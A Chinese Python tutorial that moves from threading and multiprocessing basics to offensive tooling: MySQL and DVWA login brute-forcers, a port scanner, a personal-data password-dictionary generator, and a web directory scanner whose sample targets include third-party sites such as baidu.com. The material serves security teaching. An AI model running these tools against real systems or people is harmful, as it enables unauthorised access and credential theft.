可以看到worker1和work2交替执行。
当使用start方法启动线程后,进程内有多个活动的线程并行的工作,就是多线程。
一个进程中至少有一个线程,并作为程序的入口,这个线程就是主线程。
一个进程至少有一个主线程。
其他线程称为工作线程。
线程安全
多线程执行一段代码,不会产生不确定的结果,那这段代码就是线程安全的。
多线程在运行过程中,由于共享同一进程中的数据,多线程并发使用同一个数据,那么数据就有可能被相互修改,从而导致某些时刻无法确定这个数据的值,最终随着多线程运行,运行结果不可预期,这就是线程不安全。
daemon线程
注:有人翻译成后台线程,也有人翻译成守护线程。
Python中,构造线程的时候,可以设置daemon属性,这个属性必须在start方法前设置好。
# 源码Thread的__init__方法中 if daemon is not None: self._daemonic = daemon # 用户设定bool值 else: self._daemonic = current_thread().daemon
线程daemon属性,取用户设置的值,否则就取当前线程(父线程)的daemon值。
主线程是non-daemon线程,即daemon = False。
class _MainThread(Thread): def __init__(self): Thread.__init__(self, name="MainThread", daemon=False)
这说明,daemon如果不设置取父线程的daemon值。
import time import threading def foo(): time.sleep(5) for i in range(20): print(i) # 主线程是non-daemon线程 t = threading.Thread(target=foo, daemon=False) t.start() print('Main Thread Exits')
发现线程t依然执行,主线程已经执行完,但是一直等着线程t。
修改为 t = threading.Thread(target=foo, daemon=True) 试一试,结果程序立即结束了,进程根本没有等daemon线程t。
名称 含义
daemon属性 表示线程是否是daemon线程,这个值必须在start()之前设置,否则引发RuntimeError异常
isDaemon() 是否是daemon线程
setDaemon 设置为daemon线程,必须在start方法之前设置
看一个例子,,看看主线程何时结束daemon线程
import time import threading def worker(name, timeout): time.sleep(timeout) print('{} working'.format(name)) # 主线程 是non-daemon线程 t1 = threading.Thread(target=worker, args=('t1', 5), daemon=True) # 调换5和10看看效果 t1.start() t2 = threading.Thread(target=worker, args=('t2', 10), daemon=False) t2.start() print('Main Thread Exits')
上例说明,如果还有non-daemon线程在运行,进程不结束,进程也不会杀掉其它所有daemon线程。直到所有non-daemon线程全部运行结束(包括主线程),不管有没有daemon线程,程序退出。
总结
- 主线程是non-daemon线程,即daemon = False
- 线程具有一个daemon属性,可以手动设置为True或False,也可以不设置,则取默认值None
- 如果daemon=None,就取当前线程(父线程)的daemon来设置它
- 从主线程创建的所有线程的不设置daemon属性,则默认都是daemon = False,也就是non-daemon线程
- Python程序在没有活着的non-daemon线程运行时,程序退出,包括non-daemon的主线程。也就是除主线程之外剩下的只能都是daemon线程,主线程才能退出,否则即使是主线程已经执行完,进程也不能结束,只能等待
join方法
先看一个简单的例子,看看效果
import time import threading def worker(name, timeout): time.sleep(timeout) print('{} working'.format(name)) t1 = threading.Thread(target=worker, args=('t1', 3), daemon=True) t1.start() t1.join()# 设置join,取消join对比一下 print('Main Thread Exits')
使用了join方法后,当前线程阻塞了,daemon线程执行完了,主线程才退出了。
import time import threading def worker(name, timeout): time.sleep(timeout) print('{} working'.format(name)) t1 = threading.Thread(target=worker, args=('t1', 10), daemon=True) t1.start() t1.join(2) # 阻塞2秒结束 print('~~~~~~~~~~~') t1.join(2) print('~~~~~~~~~~~') print('Main Thread Exits')
join(timeout=None)
- join方法是线程的标准方法之一
- 一个线程中调用另一个线程的join方法,调用者将被阻塞,直到被调用线程终止,或阻塞超时
- 一个线程可以被join多次
- timeout参数指定调用者等待多久,没有设置超时,就一直等到被调用线程结束
- 调用谁的join方法,就是join谁,就要等谁
线程同步
概念
线程同步,线程间协同,通过某种技术,让一个线程访问某些数据时,其他线程不能访问这些数据,直到该线程完成对数据的操作。
Event ***
Event事件,是线程间通信机制中最简单的实现,使用一个内部的标记flag,通过flag的True或False的变化来进行操作。
名称 含义 set() 标记设置为True clear() 标记设置为False is_set() 标记是否为True wait(timeout=None) : 设置等待标记为True的时长,None为无限等待。等到返回True,未等到超时了返回False
练习
老板雇佣了一个工人,让他生产杯子,老板一直等着这个工人,直到生产了10个杯子
# 下面的代码是否能够完成功能? from threading import Event, Thread import logging import time FORMAT = '%(asctime)s %(threadName)s %(thread)s %(message)s' logging.basicConfig(format=FORMAT, level=logging.INFO) cups = [] flag = False def boss(): logging.info("I'm boss, waiting for U") while True: time.sleep(1) if flag: break logging.info('Good Job.') def worker(count=10): logging.info('I am working for U') while True: logging.info('make 1 cup') time.sleep(0.5) cups.append(1) if len(cups) >= count: flag = True break logging.info('I finished my job. cups={}'.format(cups)) b = Thread(target=boss, name='boss') w = Thread(target=worker, name='worker') b.start() w.start()
上面代码基本能够完成,但上面代码问题有:
- bug,应该将worker中的flag定义为global就可解决
- 老板一直要不停的查询worker的状态变化
from threading import Event, Thread import logging import time FORMAT = '%(asctime)s %(threadName)s %(thread)s %(message)s' logging.basicConfig(format=FORMAT, level=logging.INFO) def boss(event:Event): logging.info("I'm boss, waiting for U") event.wait() # 阻塞等待 logging.info('Good Job.') def worker(event:Event, count=10): logging.info('I am working for U') cups = [] while True: logging.info('make 1 cup') time.sleep(0.5) cups.append(1) if len(cups) >= count: event.set() break logging.info('I finished my job. cups={}'.format(cups)) event = Event() b = Thread(target=boss, name='boss', args=(event,)) w = Thread(target=worker, name='worker', args=(event,)) b.start() w.start()
总结
需要使用同一个Event对象的标记flag。
谁wait就是等到flag变为True,或等到超时返回False。
不限制等待者的个数,通知所有等待者。
wait的使用
# 修改上例worker中的 while 条件 def worker(event:Event, count=10): logging.info('I am working for U') cups = [] while not event.wait(0.5): # 使用wait阻塞等待 logging.info('make 1 cup') cups.append(1) if len(cups) >= count: event.set() #break # 为什么可以注释break呢? logging.info('I finished my job. cups={}'.format(cups))
Lock ***
- Lock类是mutex互斥锁
- 一旦一个线程获得锁,其它试图获取锁的线程将被阻塞,只到拥有锁的线程释放锁
- 凡是存在共享资源争抢的地方都可以使用锁,从而保证只有一个使用者可以完全使用这个资源。
名称 含义 acquire(blocking=True, timeout=-1) 默认阻塞,阻塞可以设置超时时间。非阻塞时,timeout禁止设置。 成功获取锁,返回True,否则返回False release() 释放锁。可以从任何线程调用释放。 已上锁的锁,会被重置为unlocked 未上锁的锁上调用,抛RuntimeError异常。
锁的基本使用
import threading import time lock = threading.Lock() # 互斥mutex lock.acquire() print('-' * 30) def worker(l): print('worker start', threading.current_thread()) l.acquire() print('worker done', threading.current_thread()) for i in range(10): threading.Thread(target=worker, name="w{}".format(i), args=(lock,), daemon=True).start() print('-' * 30) while True: cmd = input(">>>") if cmd == 'r': # 按r后枚举所有线程看看 lock.release() print('released one locker') elif cmd == 'quit': lock.release() break else: print(threading.enumerate()) print(lock.locked())
上例可以看出不管在哪一个线程中,只要对一个已经上锁的锁发起阻塞地请求,该线程就会阻塞。
练习
订单要求生产1000个杯子,组织10个工人生产。请忽略老板,关注工人生成杯子
import threading from threading import Thread, Lock import time import logging FORMAT = "%(asctime)s %(threadName)s %(thread)d %(message)s" logging.basicConfig(format=FORMAT, level=logging.INFO) cups = [] def worker(count=1000): logging.info("I'm working") while True: if len(cups) >= count: break time.sleep(0.0001) # 为了看出线程切换效果,模拟杯子制作时间 cups.append(1) logging.info('I finished my job. cups = {}'.format(len(cups))) for i in range(1, 11): t = Thread(target=worker, name="w{}".format(i), args=(1000,)) t.start()
从上例的运行结果看出,多线程调度,导致了判断失效,多生产了杯子。
如何修改解决这个问题?加锁
上例使用锁实现如下:
import threading from threading import Thread, Lock import time import logging FORMAT = "%(asctime)s %(threadName)s %(thread)d %(message)s" logging.basicConfig(format=FORMAT, level=logging.INFO) cups = [] lock = Lock() # 锁 def worker(count=1000): logging.info("I'm working") while True: lock.acquire() # 获取锁 if len(cups) >= count: #lock.release() # 1 break #lock.release() # 2 time.sleep(0.0001) # 为了看出线程切换效果,模拟杯子制作时间 cups.append(1) lock.release() # 3 logging.info('I finished my job. cups = {}'.format(len(cups))) for i in range(1, 11): t = Thread(target=worker, name="w{}".format(i), args=(1000,)) t.start()
锁分析
位置2分析
- 假设某一个瞬间,有一个工作线程A获取了锁,len(cups)正好有999个,然后就释放了锁,可以继续执行下面的语句,生产一个杯子,这地方不阻塞,但是正好杯子也没有生产完。锁释放后,其他线程就可以获得锁,线程B获得了锁,发现len(cups)也是999个,然后释放锁,然后也可以去生产一个杯子。锁释放后,其他的线程也可能获得锁。就说A和B线程都认为是999个,都会生产一个杯子,那么实际上最后一定会超出1000个。
- 假设某个瞬间一个线程获得锁,然后发现杯子到了1000个,没有释放锁就直接break了,由于其他线程还在阻塞等待锁释放,这就成了死锁了。
位置3分析
- 获得锁的线程发现是999,有资格生产杯子,生产一个,释放锁,看似很完美
- 问题在于,获取锁的线程发现杯子有1000个,直接break,没释放锁离开了,死锁了
位置1分析
- 如果线程获得锁,发现是1000,break前释放锁,没问题
- 问题在于,A线程获得锁后,发现小于1000,继续执行,其他线程获得锁全部阻塞。A线程再次执行循环后,自己也阻塞了。死锁了。
问题:究竟怎样加锁才正确呢?
要在位置1和位置3同时加release。
上下文支持
锁是典型必须释放的,Python提供了上下文支持。查看Lock类的上下文方法,__enter__方法返回bool表示是否获得锁,__exit__方法中释放锁。
由此上例可以修改为
import threading from threading import Thread, Lock import time import logging FORMAT = "%(asctime)s %(threadName)s %(thread)d %(message)s" logging.basicConfig(format=FORMAT, level=logging.INFO) cups = [] lock = Lock() # 锁 def worker(count=1000): logging.info("I'm working") while True: with lock: # 获取锁,离开with释放锁 if len(cups) >= count: logging.info('leaving') break time.sleep(0.0001) # 为了看出线程切换效果,模拟杯子制作时间 cups.append(1) logging.info(lock.locked()) logging.info('I finished my job. cups = {}'.format(len(cups))) for i in range(1, 11): t = Thread(target=worker, name="w{}".format(i), args=(1000,)) t.start()
感觉一下正确得到结果了吗?感觉到了执行速度了吗?慢了还是快了,为什么? 比之前少了释放锁操作
锁的应用场景
锁适用于访问和修改同一个共享资源的时候,即读写同一个资源的时候。
如果全部都是读取同一个共享资源需要锁吗?
不需要。因为这时可以认为共享资源是不可变的,每一次读取它都是一样的值,所以不用加锁
使用锁的注意事项:
- 少用锁,必要时用锁。使用了锁,多线程访问被锁的资源时,就成了串行,要么排队执行,要么争抢执行
- 举例,高速公路上车并行跑,可是到了省界只开放了一个收费口,过了这个口,车辆依然可以在多车道上一起跑。过收费口的时候,如果排队一辆辆过,加不加锁一样效率相当,但是一旦出现争抢,就必须加锁一辆辆过。注意,不管加不加锁,只要是一辆辆过,效率就下降了。
- 举例,高速公路上车并行跑,可是到了省界只开放了一个收费口,过了这个口,车辆依然可以在多车道上一起跑。过收费口的时候,如果排队一辆辆过,加不加锁一样效率相当,但是一旦出现争抢,就必须加锁一辆辆过。注意,不管加不加锁,只要是一辆辆过,效率就下降了。
- 加锁时间越短越好,不需要就立即释放锁
- 一定要避免死锁
不使用锁,有了效率,但是结果是错的。
使用了锁,效率低下,但是结果是对的。
所以,我们是为了效率要错误结果呢?还是为了对的结果,让计算机去计算吧
Queue的线程安全
标准库queue模块,提供FIFO的Queue、LIFO的队列、优先队列。
Queue类是线程安全的,适用于同一进程内多线程间安全的交换数据。内部使用了Lock和Condition。
特别注意下面的代码在多线程中使用
import queue q = queue.Queue(8) if q.qsize() == 7: q.put() # 上下两句可能被打断 if q.qsize() == 1: q.get() # 未必会成功
如果不加锁,是不可能获得准确的大小的,因为你刚读取到了一个大小,还没有取走数据,就有可能被其他线程改了。
Queue类的size虽然加了锁,但是,依然不能保证立即get、put就能成功,因为读取大小和get、put方法是分开的。
多进程
多线程未必是CPU密集型程序的好的选择。
多进程可以完全独立的进程环境中运行程序,可以较充分地利用多处理器。
但是进程本身的隔离带来的数据不共享也是一个问题。而且线程比进程轻量级。
multiprocessing
Process类
Process类遵循了Thread类的API,减少了学习难度。
先看一个例子,前面介绍的单线程、多线程比较的例子的多进程版本
import multiprocessing import datetime def calc(i): sum = 0 for _ in range(1000000000): # 10亿 sum += 1 return i, sum if __name__ == '__main__': start = datetime.datetime.now() # 注意一定要有这一句 ps = [] for i in range(4): p = multiprocessing.Process(target=calc, args=(i,), name='calc-{}'.format(i)) ps.append(p) p.start() for p in ps: p.join() print(p.name, p.exitcode) delta = (datetime.datetime.now() - start).total_seconds() print(delta) for p in ps: print(p.name, p.exitcode) print('===end====')
对于上面这个程序,在同一主机(授课主机)上运行时长的对比
- 使用单线程、多线程跑了4分钟多
- 多进程用了1分半
看到了多个进程都在使用CPU,这是真并行,而且进程库几乎没有什么学习难度
注意:多进程代码一定要放在 __name__ =
"main"= 下面执行。
名称 说明
pid 进程id
exitcode 进程的退出状态码
terminate() 终止指定的进程
进程间同步
Python在进程间同步提供了和线程同步一样的类,使用的方法一样,使用的效果也类似。
不过,进程间代价要高于线程间,而且系统底层实现是不同的,只不过Python屏蔽了这些不同之处,让用户简单使用多进程。
multiprocessing还提供共享内存、服务器进程来共享数据,还提供了用于进程间通讯的Queue队列、Pipe管道。
多进程、多线程的选择
1、CPU密集型
CPython中使用到了GIL,多线程的时候锁相互竞争,且多核优势不能发挥,选用Python多进程效率更高。
2、IO密集型
在Python中适合是用多线程,可以减少多进程间IO的序列化开销。且在IO等待的时候,切换到其他线程继续执行,效率不错。
应用
请求/应答模型:WEB应用中常见的处理模型
master启动多个worker工作进程,一般和CPU数目相同。发挥多核优势。
worker工作进程中,往往需要操作网络IO和磁盘IO,启动多线程,提高并发处理能⼒。worker处理用户的请求,
往往需要等待数据,处理完请求还要通过网络IO返回响应。
这就是nginx工作模式。
concurrent.futures包
3.2版本引入的模块。
异步并行任务编程模块,提供一个高级的异步可执行的便利接口。
提供了2个池执行器:
- ThreadPoolExecutor 异步调用的线程池的Executor
- ProcessPoolExecutor 异步调用的进程池的Executor
ThreadPoolExecutor对象
首先需要定义一个池的执行器对象,Executor类的子类实例。
方法 含义 ThreadPoolExecutor(max_workers=1) 池中至多创建max_workers个线程的池来同时异步执行,返回Executor实例 支持上下文,进入时返回自己,退出时调用 shutdown(wait=True) submit(fn, *args, **kwargs) 提交执行的函数及其参数,如有空闲开启daemon线程,返回Future类的实例 shutdown(wait=True) 清理池,wait表示是否等待到任务线程完成
Future类
方法 含义 done() 如果调用被成功的取消或者执行完成,返回True cancelled() 如果调用被成功的取消,返回True running() 如果正在运行且不能被取消,返回True cancel() 尝试取消调用。如果已经执行且不能取消返回False,否则返回True result(timeout=None) 取返回的结果,timeout为None,一直等待返回;timeout设置到期,抛出concurrent.futures.TimeoutError 异常 exception(timeout=None) 取返回的异常,timeout为None,一直等待返回;timeout设置到期,抛出concurrent.futures.TimeoutError 异常
from concurrent.futures import ThreadPoolExecutor, wait import datetime import logging FORMAT = "%(asctime)s [%(processName)s %(threadName)s] %(message)s" logging.basicConfig(format=FORMAT, level=logging.INFO) def calc(base): sum = base for i in range(100000000): sum += 1 logging.info(sum) return sum start = datetime.datetime.now() executor = ThreadPoolExecutor(3) with executor: # 默认shutdown阻塞 fs = [] for i in range(3): future = executor.submit(calc, i*100) fs.append(future) #wait(fs) # 阻塞 print('-' * 30) for f in fs: print(f, f.done(), f.result()) # done不阻塞,result阻塞 print('=' * 30) delta = (datetime.datetime.now() - start).total_seconds() print(delta)
ProcessPoolExecutor对象
方法一样。就是使用多进程完成。
from concurrent.futures import ProcessPoolExecutor, wait import datetime import logging FORMAT = "%(asctime)s [%(processName)s %(threadName)s] %(message)s" logging.basicConfig(format=FORMAT, level=logging.INFO) def calc(base): sum = base for i in range(100000000): sum += 1 logging.info(sum) return sum if __name__ == '__main__': start = datetime.datetime.now() executor = ProcessPoolExecutor(3) with executor: # 默认shutdown阻塞 fs = [] for i in range(3): future = executor.submit(calc, i*100) fs.append(future) #wait(fs) # 阻塞 print('-' * 30) for f in fs: print(f, f.done(), f.result()) # done不阻塞,result阻塞 print('=' * 30) delta = (datetime.datetime.now() - start).total_seconds() print(delta)
总结
该库统一了线程池、进程池调用,简化了编程。
是Python简单的思想哲学的体现。
唯一的缺点:无法设置线程名称。但这都不值一提。
扫描与爆破
主要内容:
- python 协议暴力破解框架
- python MySQL 暴力破解
- http 表单暴力破解
- python 爆破-sqlserver
- python 端口扫描程序
python Mysql&SqlServer 暴力破解
首先使用 dvwa 数据库,并新增一个用户
mysql> CREATE USER 'Cici'@'%' IDENTIFIED BY '123456';
使用pymysql连接数据库,并进行暴力破解
安装pymysql
pip install pymysql
import pymysql password_list = [ "pass1", "pass2", "pass3", "pass4", "pass5", "pass6", "pass7", "pass8", "pass9", "pass10", "pass11", "pass12", "123456" ] dict = {'user': 'Cici', 'host': '124.222.171.19', #'password': 'root', 'database': 'dvwa', 'port': 33060} for password in password_list: try: data = pymysql.connect(password=password, **dict) print("[+]Find Password is: %s !!!!!!!" % password) break except pymysql.err.OperationalError as e: print("[-]Password error: %s" % password)
也可以读取文件中的密码列表进行暴力破解
import pymysql def brute_force(password_list): for password in password_list: password = password.strip() try: pymysql.connect(host="127.0.0.1", port=33060, user="Cici", password=password) print("[+]Find Password is: %s !!!!!!!" % password) break except pymysql.err.OperationalError as e: print("[-]Password error: %s" % password) with open("mysql_pass.txt", "r") as f: brute_force(f.readlines())
python 端口扫描
使用线程池进行端口扫描,并记录扫描时间
import socket from concurrent.futures import ThreadPoolExecutor, wait import time def Cici_main(): target_ip = input("IP:") start_time = time.time() start_time_format = time.ctime() print("[*] Start port scan at %s" % start_time_format) future = [pool.submit(port_scan, target_ip, port) for port in range(0, 1000)] wait(future) # 等待所有线程完成 pool.shutdown() end_time = time.time() print("[*] 扫描结束,共计扫描时间: %.2f s" % (end_time - start_time)) def port_scan(target, port): try: client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 创建socket对象 client.connect((target, port)) # 建立TCP连接 print("[*] %s: %d 端口开放" % (target, port)) client.close() except: pass # 捕获异常 if __name__ == "__main__": pool = ThreadPoolExecutor(max_workers=20) Cici_main()
HTTP表单暴力破解
首先先写一个用来爆破dvwa的函数
import requests import operator def brute_force(user, password): proxy = {"http": "127.0.0.1:8081"} # DVWA 登陆接口 url = "http://127.0.0.1:8080/vulnerabilities/brute/?username=%s&password=%s&Login=Login" % (user, password) user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) " \ "Chrome/101.0.4951.41 Safari/537.36" header = {"User-Agent": user_agent, "Content-Type": "application/x-www-form-urlencoded", "Cookie": "PHPSESSID=q0jjc3mnedod1gsqcd2tt53sg4; security=low"} response = requests.get(url, headers=header) data = response.text if operator.contains(data, "Welcome to the password protected area"): print("[+] Login Success, Password is %s !!!" % password) else: print("[-] Login Error") if __name__ == '__main__': brute_force("gordonb", "abc123")
之后读取用户名、密码文件,使用多线程进行爆破
import requests import operator from concurrent.futures import ThreadPoolExecutor, wait def brute_force(user, password): proxy = {"http": "127.0.0.1:8081"} # DVWA 登陆接口 url = "http://127.0.0.1:8080/vulnerabilities/brute/?username=%s&password=%s&Login=Login" % (user, password) user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) " \ "Chrome/101.0.4951.41 Safari/537.36" header = {"User-Agent": user_agent, "Content-Type": "application/x-www-form-urlencoded", "Cookie": "PHPSESSID=q0jjc3mnedod1gsqcd2tt53sg4; security=low"} response = requests.get(url, headers=header) data = response.text if operator.contains(data, "Welcome to the password protected area"): print("[+] Login Success, Password is %s !!!" % password) else: print("[-] Login Error") def brute_force_read_file(): brute_list = [] with open("username_list.txt", "r") as user_file: for user in user_file: with open("password_list.txt", "r") as pass_file: for password in pass_file: future = pool.submit(brute_force, user.strip(), password.strip()) brute_list.append(future) wait(brute_list) if __name__ == '__main__': pool = ThreadPoolExecutor(max_workers=20) brute_force_read_file()
pyhon 信息收集工具编写
主要内容:
- 密码字典生成器编写
- 子域名扫描程序
- web目录扫描程序
- 指纹识别工具开发
- C段web服务扫描
密码字典生成器编写
思路:
- 收集相关信息
- 汉字转拼音
- 不同的信息抽取方式
- 关键信息组合
#!/usr/bin/env python # coding:utf-8 import time from pypinyin import lazy_pinyin class Person: NAME = "Cici" PHONE = ["13512345678", ] CARD = "220281198309243953" BIRTHDAY = ("1983", "09", "24") HOMETOWN = ("河南", "郑州", "高新区") PLACE = [("北京", "昌平", "清河"), ] QQ = ["18746370", ] COMPANY = [("Key", "Cici"), ] SCHOOL = [("清华大学", "清华", "tsinghua")] ACCOUNT = ["cici", ] PASSWORD = ["old_password", ] Delimiters = ["", "-", ".", "|", "_", "+", "#", "@"] Prefix = ["", ] Suffix = ["", "123", "@", "abc", ".", "123.", "!!!", ] # 获取拼音 def get_pinyin(word): pinyin = "" for i in lazy_pinyin(word): pinyin = pinyin + ''.join(i) return pinyin # 获取缩写 def get_abbreviation(word): result = "" for i in word: result += get_pinyin(i)[0] return result # 获取全拼 def get_full_pinyin(word): return get_pinyin(word) # 首字母大写 def get_title(word): return word.title() def get_name_component(person): result = [] # 获取姓名全拼 result.append(get_pinyin(person.NAME)) # 获取 姓 全拼 result.append(get_pinyin(person.NAME[0])) # 获取 名 全拼 result.append(get_pinyin(person.NAME[1:])) # 获取首字母大写姓名全拼 result.append(get_title(get_pinyin(person.NAME))) # 获取首字母大写 姓 全拼 result.append(get_title(get_pinyin(person.NAME[0]))) # 获取首字母大写 名 全拼 result.append(get_title(get_pinyin(person.NAME[1:]))) # 获取缩写姓名拼音(只有首字母) result.append(get_abbreviation(person.NAME)) # 获取缩写 姓 拼音 result.append(get_abbreviation(person.NAME[0])) # 获取缩写 名 拼音 result.append(get_abbreviation(person.NAME[1:])) return result def get_phone_component(person): result = [] for phone in person.PHONE: # 获取手机号 result.append(phone) # 获取手机号后四位 result.append(phone[-4:]) return result def get_card_component(person): result = [] # 获取银行卡号 result.append(person.CARD) # 获取银行卡号后六位 result.append(person.CARD[-6:]) # 获取银行卡号前六位 result.append(person.CARD[0:6]) return result def get_birthday_component(person): result = [] year = person.BIRTHDAY[0] month = person.BIRTHDAY[1] day = person.BIRTHDAY[2] # 获取年/月/日的各种组合 result.append(year) result.append(year[2:]) result.append(month + day) result.append(year + month + day) return result def get_hometown_component(person): result = [] # 获取地址全拼 result.append(get_pinyin(person.HOMETOWN[0])) result.append(get_pinyin(person.HOMETOWN[1])) result.append(get_pinyin(person.HOMETOWN[2])) # 获取首字母大写的地址全拼 result.append(get_title(get_pinyin(person.HOMETOWN[0]))) result.append(get_title(get_pinyin(person.HOMETOWN[1]))) result.append(get_title(get_pinyin(person.HOMETOWN[2]))) # 获取缩写的地址拼音 result.append(get_abbreviation(person.HOMETOWN[0])) result.append(get_abbreviation(person.HOMETOWN[1])) result.append(get_abbreviation(person.HOMETOWN[2])) return result def get_place_component(person): result = [] for place in person.PLACE: result.append(get_pinyin(place[0])) result.append(get_pinyin(place[1])) result.append(get_pinyin(place[2])) result.append(get_title(get_pinyin(place[0]))) result.append(get_title(get_pinyin(place[1]))) result.append(get_title(get_pinyin(place[2]))) result.append(get_abbreviation(place[0])) result.append(get_abbreviation(place[1])) result.append(get_abbreviation(place[2])) return result def get_qq_component(person): result = [] for qq in person.QQ: result.append(qq) return result # 获取公司信息 def get_company_component(person): result = [] for company in person.COMPANY: for name in company: result.append(get_pinyin(name)) result.append(get_title(get_pinyin(name))) result.append(get_abbreviation(name)) return result # 获取学校信息 def get_school_component(person): result = [] for school in person.SCHOOL: for name in school: result.append(get_pinyin(name)) result.append(get_title(get_pinyin(name))) result.append(get_abbreviation(name)) return result # 获取账号信息 def get_account_component(person): result = [] for account in person.ACCOUNT: result.append(get_pinyin(account)) result.append(get_title(get_pinyin(account))) result.append(get_abbreviation(account)) return result # 通过不同方式获取各组件信息 def get_all_component(person): result = [] result.append(get_name_component(person)) result.append(get_phone_component(person)) result.append(get_card_component(person)) result.append(get_birthday_component(person)) result.append(get_hometown_component(person)) result.append(get_place_component(person)) result.append(get_qq_component(person)) result.append(get_company_component(person)) result.append(get_school_component(person)) result.append(get_account_component(person)) return result def write_password(password, filename): print("[+] %s" % password) with open(filename, "a+") as f: f.write("%s\n" % password) def combined_character(compents, Delimiter, prefix, suffix, filename): for compent in compents: for i in compent: if Delimiter == "": password = prefix + i + Delimiter + suffix write_password(password, filename) continue password = prefix + i + Delimiter + suffix write_password(password, filename) password = prefix + Delimiter + i + suffix write_password(password, filename) def combined_character_tow(compents, Delimiter, prefix, suffix, filename): for compent_a in compents: for compent_b in compents: for i in compent_a: for j in compent_b: password = prefix + i + Delimiter + j + suffix write_password(password, filename) def gen_pass(): #生成密码函数 compents = get_all_component(Person) # 获取成分信息 filename = "password.list" # 单组件密码 for Delimiter in Delimiters: for prefix in Prefix: for suffix in Suffix: combined_character(compents, Delimiter, prefix, suffix, filename) # 两组件密码 for Delimiter in Delimiters: for prefix in Prefix: for suffix in Suffix: combined_character_tow(compents, Delimiter, prefix, suffix, filename) if __name__ == "__main__": start_time = time.time() gen_pass() end_time = time.time() print("[*] 扫描结束,共计扫描时间: %.2f s" % (end_time - start_time))
思考:
如何提高生成效率?
WEB目录扫描程序
- main.py 主函数
- config.json 配置文件
- websites.txt 域名文件
- dir_folder/php_dir.txt 待扫描路径
- webDirScan.py 扫描文件
- util.py 工具类
使用 logging 模块记录日志
# util.py import logging from logging import handlers class Logger(object): level_relations = { 'debug': logging.DEBUG, 'info': logging.INFO, 'warning': logging.WARNING, 'error': logging.ERROR, 'crit': logging.CRITICAL } # 日志级别关系映射 def __init__(self, filename, level='info', when='D', backcount=3, fmt='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s'): self.logger = logging.getLogger(filename) format_str = logging.Formatter(fmt) # 设置日志格式 self.logger.setLevel(self.level_relations.get(level)) # 设置日志级别 sh = logging.StreamHandler() # 往屏幕上输出 sh.setFormatter(format_str) # 设置屏幕上显示的格式 th = handlers.TimedRotatingFileHandler(filename=filename, when=when,backupCount=backcount,encoding='utf-8') # 往文件里写入 指定间隔时间自动生成文件的处理器 # 实例化TimedRotatingFileHandler # interval是时间间隔,backupCount是备份文件的个数,如果超过这个个数,就会自动删除,when是间隔的时间单位,单位有以下几种: # S 秒 # M 分 # H 小时、 # D 天、 # W 每星期(interval==0时代表星期一) # midnight 每天凌晨 th.setFormatter(format_str) # 设置文件里写入的格式 self.logger.addHandler(sh) # 把对象加到logger里 self.logger.addHandler(th)
通过配置文件来配置扫描内容
config.json
{ // web域名配置文件 "websites" : "websites.txt", // web目录文件 "dic_folder" : "dir_folder", "request_method" : "GET", // 指定扫描线程数 "thread_num" : 16 }
websites.txt
www.baidu.com https://www.z2pyw.com/mv
- dir_folder/php_dir.txt 待扫描路径
test/ page/1 test.php
管理模块用来读取配置文件,启动扫描任务
# mian.py import json from concurrent.futures import ThreadPoolExecutor from webDirScan import * class Manager(object): cfg = None def __init__(self): #初始化线程池并加载文件内容 try: conf = json.load(open('config.json')) self.cfg = {'websites': self.read_websites(conf['websites']), 'dics': self.read_web_path(conf['dic_folder']), 'thread_num': conf['thread_num']} self.pool = ThreadPoolExecutor(max_workers=self.cfg['thread_num']) except Exception as e: logging.error('Manager __init__ error: %s' % e) def start(self): try: for site in self.cfg['websites']: # 每读取一个域名就启动一个线程进行扫描 w = Worker(site, self.cfg, self.pool) w.start() except Exception as e: logging.error('Manager Start error: %s' % e) def read_websites(self, webcfg): try: websites = [] with open(webcfg, 'r') as webs: for web in webs.readlines(): websites.append(web.strip()) return websites except Exception as e: logging.error('ReadWebsites error : %s' % e) def read_web_path(self, diccfg): try: dics = [] doclist = os.listdir(diccfg) doclist.sort() for filename in doclist: filename = diccfg+'/'+filename with open(filename, 'r') as f: for i in f.readlines(): dics.append(i.strip()) return dics except Exception as e: logging.error('dic error : %s , dicname:%s' % (e, filename)) def main(): w = Manager() #创建管理者实例 w.start() if __name__ == '__main__': main()
扫描目录负责目录扫描和信息记录
# webDirScan.py import requests import threading import os import time from util import Logger from concurrent.futures import wait from requests.packages import urllib3 # 忽略HTTPS告警 urllib3.disable_warnings() g_mutex = threading.Lock() # 日志文件目录为当前目录所在文件下的log目录 log_dir = os.path.dirname(os.path.abspath(__file__))+'/log/' # 目录不存在则创建 if not os.path.exists(log_dir): os.mkdir(log_dir) cur_time = time.strftime('%Y-%m-%d', time.localtime(time.time())).replace(':','').replace(' ', '_') LogFile = log_dir + cur_time + '.log' logging = Logger(LogFile, level='debug').logger class Worker(object): site = None cfg = None def __init__(self, site, cfg, pool): self.site = site self.cfg = cfg self.pool = pool def start(self): try: scan_list = [] for web_dir in self.cfg['dics']: t = Scanner(self.site, web_dir) future = self.pool.submit(t.run()) scan_list.append(future) wait(scan_list) except Exception as e: logging.error('Start error: %s' % e) class Scanner(): site = None dics = None request_method = None headers = { 'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) ' 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36'} def __init__(self, site, dics): try: self.site = site self.dics = dics if self.site.endswith('/'): self.site = self.site[:-1] if '://' not in self.site: self.site = 'http://' + self.site except Exception as e: logging.error('Scanner_init error: %s' % e) def run(self): self.ScanOne(self.site, self.dics) def ScanOne(self, site, dic): try: if not dic.startswith('/'): dic = '/' + dic url = site + dic # 不允许重定向,防止重定向误识别为存在的页面 res = requests.get(url, verify=False, allow_redirects=False, headers=self.headers, timeout=8) if 200 == res.status_code: print('\033[93m[+]\033[96m%d\033[0m %s' % (res.status_code, url)) self.WriteFile('./out.txt', url) else: print('\033[95m[-]\033[31m%d\033[0m %s' % (res.status_code, url)) except Exception as e: if 'Max retries exceeded with url' in str(e): pass else: logging.error('Start error: %s , url:%s' % (e, url)) def WriteFile(self, file, msg): try: # 写文件时加锁 g_mutex.acquire() with open(file, 'a+') as f: f.write('%s\r\n' % (str(msg))) except Exception as e: logging.error('WriteFile error : %s' % e) finally: g_mutex.release()
指纹识别工具开发
使用python-nmap 模块进行指纹识别并输出
pip install python-nmap
